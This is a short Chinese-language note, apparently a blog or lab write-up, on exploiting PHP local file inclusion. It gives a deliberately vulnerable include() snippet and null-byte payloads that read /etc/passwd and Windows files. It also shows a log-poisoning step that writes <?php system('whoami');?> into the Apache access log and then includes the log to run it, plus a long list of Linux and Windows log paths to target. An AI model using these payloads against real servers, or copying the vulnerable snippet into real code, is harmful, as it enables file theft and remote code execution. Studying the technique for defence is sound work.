0x00 案例

参考资料：http://downloads.ackack.net/LocalFileInclusion.pdf

实验代码：

<?php
include($_GET['for'].‘.php’);//用于测试本地包含漏洞
?>

Linux

test.php?for=/etc/passwd%00

Win

test.php?for=D:\readme.txt%00

Log Injection

訪問任意頁面，問號後面寫payload，將payload寫入到log中，然後包含log文件執行payload。

test.php?<php%20system('whoami');?>

當然，需要服務器開啟日誌記錄功能。

DoFuck

//linux
test.php?for=/var/log/apache/logs/access_log%00
//win
test.php?for=..\apache\logs\access.log%00

附录：可能的log路径

/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log